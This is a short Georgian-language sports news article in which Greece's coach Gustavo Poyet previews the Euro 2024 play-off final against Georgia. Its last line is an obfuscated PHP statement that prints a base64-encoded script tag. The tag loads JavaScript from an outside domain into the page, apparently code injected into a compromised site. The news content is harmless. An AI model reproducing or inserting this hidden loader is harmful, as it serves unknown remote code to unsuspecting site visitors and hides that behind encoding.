celsiusi
ავერსი საქკაბელი

საბერძნეთის ნაკრებმა საქართველოს ეროვნულ გუნდთან ევრო 2024-ის პლეი ოფის ფინალურ მატჩამდე „დინამო არენაზე“ ივარჯიშა. ვარჯიშის დაწყებამდე გუნდის მთავარმა მწვრთნელმა, გუსტავო პოიეტმა პრესკონფერენცია გამართა.

„რამეს თუ ნიშნავს ის ფაქტი, რომ აქამდე ჩატარებული ცხრა შეხვედრიდან საქართველოს ნაკრებს საბერძნეთთან ჯერ არ მოუგია... მნიშვნელობა არ აქვს რა იყო წარსულში, ჩვენი ამოცანაა, მხოლოდ ხვალინდელ თამაშზე ვიფიქროთ.

გვაქვს თუ არა გეგმა ხვიჩა კვარაცხელიას წინააღმდეგ სათამაშოდ, რა თქმა უნდა, ამაზე ახლა არ ვისაუბრებ, მაგრამ საქართველოს ნაკრებს კარგად ვიცნობ და არა მგონია, ვილი სანიოლმა ამ მატჩისთვის რამე შეცვალოს.

ორივე გუნდში ბევრი ახალგაზრდა ფეხბურთელია, მთავარი იქნება, როგორ გაუძლებენ წნეხს და თავის შესაძლებლობებს როგორ წარმოაჩენენ – ამ კითხვაზე პასუხს ხვალ გავიგებთ“, – განაცხადა გუსტავო პოიეტმა.

355
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");